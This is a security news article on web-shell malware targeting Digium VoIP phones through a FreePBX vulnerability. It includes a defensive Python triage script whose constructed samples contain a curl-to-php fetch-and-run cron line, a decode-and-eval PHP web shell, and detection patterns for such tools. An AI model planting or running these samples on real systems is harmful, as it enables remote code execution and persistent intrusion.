Security researchers have discovered threat actors targeting Digium phones with a range of malware samples. The malware exploits a vulnerability in the VoIP phones’ software to install a web shell. Researchers advise users to stay vigilant against such attacks.
Malware Targeting Digium Phones
According to a recent post from Palo Alto Networks, its researchers found numerous malware campaigns targeting Digium phones.
As explained in the post, the threat actors implant web shells into the Elastix system on the target Digium phones to steal data. The web shell not only drops additional payloads but also executes code according to whatever activity the attackers intend. The researchers linked this behavior to CVE-2021-45461, a vulnerability in the Rest Phone Apps (restapps) module of the FreePBX software.
The researchers first observed the malicious campaigns in December 2021. Between then and March 2022, they detected over 500,000 unique malware samples linked to malicious traffic generated from Digium’s Asterisk software for VoIP phones.
Regarding the attack strategy, the researchers observed the initial attack vector dropping an obfuscated PHP backdoor onto the file system. The malware then gained persistence by creating numerous root accounts and setting up scheduled tasks. The PHP web shell itself was padded with random junk, possibly to evade detection.
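The persistence and evasion traits described above (extra root accounts, scheduled tasks that fetch and run payloads, and padded, decode-and-eval PHP) are all things a defender can triage on a PBX host. The following is an added example, not code from the original post or from Palo Alto Networks; the passwd, crontab and PHP inputs are constructed, and treating long junk comment blocks as a padding indicator is an assumption.

```python
"""Triage helpers for the Digium/Elastix web-shell traits described in the post."""
import re

# Constructed /etc/passwd excerpt: the real root plus one extra UID-0 account.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
asterisk:x:100:101::/var/lib/asterisk:/sbin/nologin
sysadm1n:x:0:0::/tmp:/bin/bash
"""

# Constructed crontab excerpt: a normal job and one that re-fetches a payload.
SAMPLE_CRON = """0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://198.51.100.7/x.php | php
"""

# Constructed PHP: a padded decode-and-eval loader vs. ordinary application code.
SAMPLE_SHELL = '<?php /*' + 'x' * 400 + '*/ eval(gzinflate(base64_decode($_POST["c"])));'
SAMPLE_CLEAN = '<?php require_once "config.php"; echo htmlspecialchars($title);'


def extra_uid0_accounts(passwd_text):
    """Return usernames with UID 0 other than root (the extra root accounts the campaign created)."""
    found = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 3 and parts[2] == "0" and parts[0] != "root":
            found.append(parts[0])
    return found


# Fetch-and-execute pipelines or jobs running from world-writable directories.
CRON_SUSPECT = re.compile(r"\b(curl|wget)\b.*\|\s*(php|sh|bash)\b|/tmp/|/dev/shm/")


def suspicious_cron_lines(crontab_text):
    """Return crontab lines matching the persistence pattern above."""
    return [line for line in crontab_text.splitlines() if CRON_SUSPECT.search(line)]


OBFUSCATION_MARKERS = ("eval(", "base64_decode(", "gzinflate(", "str_rot13(", "assert(")


def php_obfuscation_score(source):
    """Count decode/eval indicators; a long junk comment block adds one (assumed padding trick)."""
    score = sum(source.count(marker) for marker in OBFUSCATION_MARKERS)
    if re.search(r"/\*[^*]{256,}\*/", source):
        score += 1
    return score


if __name__ == "__main__":
    print(extra_uid0_accounts(SAMPLE_PASSWD))       # ['sysadm1n']
    print(suspicious_cron_lines(SAMPLE_CRON))       # the curl | php job
    print(php_obfuscation_score(SAMPLE_SHELL), php_obfuscation_score(SAMPLE_CLEAN))  # 4 0
```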
The researchers have shared a detailed technical analysis of the malware in their post.
Users Must Stay Careful
The researchers traced the malware activity back to Russian threat actors. Specifically, the IPv4 addresses involved were geolocated in the Netherlands, but DNS lookups showed links to Russian websites.
The appearance of thousands of malware samples within a span of a few months points to rapid attacker activity against Digium users. The researchers therefore urge users to remain careful.
Implanting web shells in vulnerable servers is not a new tactic for malicious actors. Catching such advanced intrusions requires a defense-in-depth strategy: only by bringing multiple security appliances and applications together in a single pane can defenders reliably detect these attacks.
Mitigation strategies that users can adopt include using a robust firewall to protect their VoIP systems, applying advanced URL filtering to detect and block malicious URLs, and blocking malicious IPs and App-IDs from accessing their networks.